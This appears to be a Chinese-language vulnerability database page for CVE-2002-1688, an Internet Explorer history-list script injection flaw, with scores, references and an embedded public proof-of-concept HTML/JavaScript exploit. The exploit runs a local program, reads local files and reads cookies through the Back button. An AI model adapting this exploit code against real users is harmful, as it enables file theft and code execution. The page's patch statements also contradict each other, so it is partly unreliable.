CVE-2002-1688
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:15
NMCOE    

[原文]The browser history feature in Microsoft Internet Explorer 5.5 through 6.0 allows remote attackers to execute arbitrary script as other users and steal authentication information via cookies by injecting JavaScript into the URL, which is executed when the user hits the Back button.


[CNNVD]Microsoft Internet Explorer历史列表脚本插入漏洞(CNNVD-200212-760)

        
        Microsoft Internet Explorer是一款由Microsoft开发维护的流行的WEB浏览器。
        Microsoft Internet Explorer在处理历史列表中存在漏洞,可导致远程攻击者插入任意脚本代码到历史列表中并执行。
        Microsoft Internet Explorer在浏览器历史列表中使用javascript:URL方式存储,而包含在javascript:URL中的脚本代码会以最后查看页面的安全区域上下文来执行,此功能可以保护针对包含在恶意构建WEB页中javascript:URL的攻击。但是攻击者可以设置成到用户点击'后退' 键时触发javascript:URL,这可以导致包含在javascript:URL中的脚本代码在其他页面中的上下文内容中执行。
        当按'后退'键页面装载失败时,一般行为是会显示由IE在本地安全区域中操作的错误页面(在w2k中是res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#),因此javascript:URL中的脚本代码可以在本地安全区域上下文中执行,或者读取任意本地文件内容。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.5Microsoft ie 5.5
cpe:/a:microsoft:ie:5.5:sp1Microsoft Internet Explorer 5.5 SP1
cpe:/a:microsoft:ie:5.5:sp2Microsoft Internet Explorer 5.5 SP2
cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1688
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1688
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-760
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/8844
(UNKNOWN)  XF  ie-history-javascript-urls(8844)
http://www.securityfocus.com/bid/4505
(UNKNOWN)  BID  4505

- 漏洞信息

Microsoft Internet Explorer历史列表脚本插入漏洞
中危 设计错误
2002-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Internet Explorer是一款由Microsoft开发维护的流行的WEB浏览器。
        Microsoft Internet Explorer在处理历史列表中存在漏洞,可导致远程攻击者插入任意脚本代码到历史列表中并执行。
        Microsoft Internet Explorer在浏览器历史列表中使用javascript:URL方式存储,而包含在javascript:URL中的脚本代码会以最后查看页面的安全区域上下文来执行,此功能可以保护针对包含在恶意构建WEB页中javascript:URL的攻击。但是攻击者可以设置成到用户点击'后退' 键时触发javascript:URL,这可以导致包含在javascript:URL中的脚本代码在其他页面中的上下文内容中执行。
        当按'后退'键页面装载失败时,一般行为是会显示由IE在本地安全区域中操作的错误页面(在w2k中是res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#),因此javascript:URL中的脚本代码可以在本地安全区域上下文中执行,或者读取任意本地文件内容。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/windows/ie/default.asp

- 漏洞信息 (21376)

Microsoft Internet Explorer 5.5/6.0 History List Script Injection Vulnerability (EDBID:21376)
windows remote
2002-04-15 Verified
0 Andreas Sandblad
N/A [点击下载]
source: http://www.securityfocus.com/bid/4505/info

A vulnerability has been reported in some versions of Internet Explorer. It is possible to inject JavaScript code into the browser history list, and execute it within any page context given appropriate user interaction.

Internet Explorer stores javascript: URLs in the browser history list. Script executed within the javascript: URL will inherit the security zone of the last viewed page. This provides protection against javascript: URLs included within a maliciously constructed web page. However, a user may navigate to a javascript: URL using the 'Back' button in their browser. This may result in the injected script code executing within the context of another page.

This behavior has been reported in versions 6.0 and 5.5 of IE. Other versions of Internet Explorer may share this vulnerability. This has not, however, been confirmed. 

<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>

<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
  s+= 'CODEBASE='+file+'></OBJECT>';
  backBug(badUrl,s);
}
function readFile(file){
  s = '<iframe name=i src='+file+' style=display:none onload=';
  s+= 'alert(i.document.body.innerText)></iframe>';
  backBug(badUrl,s);
}
function readCookie(url){
  s = '<script>alert(document.cookie);close();<"+"/script>';
  backBug(url,s);
}
function backBug(url,payload){
  len = history.length;
  page = document.location;
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(\""+payload+"\")')";
  s+= ";history.back();} else '<script>location=\""+url
  s+= "\";document.title=\""+page+"\";<"+"/script>';";
  location = s;
}
</script>
</html>		

- 漏洞信息

2975
Microsoft IE Back Button XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Microsoft Internet Explorer contains a flaw that allows a remote Cross Site Scripting attack. This flaw exists because the application does not validate the URL upon clicking the "Back" button. This could allow a user to send a specially crafted request that would execute arbitrary code on the server leading to a loss of integrity.

- 时间线

2002-04-15 Unknow
2002-04-15 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站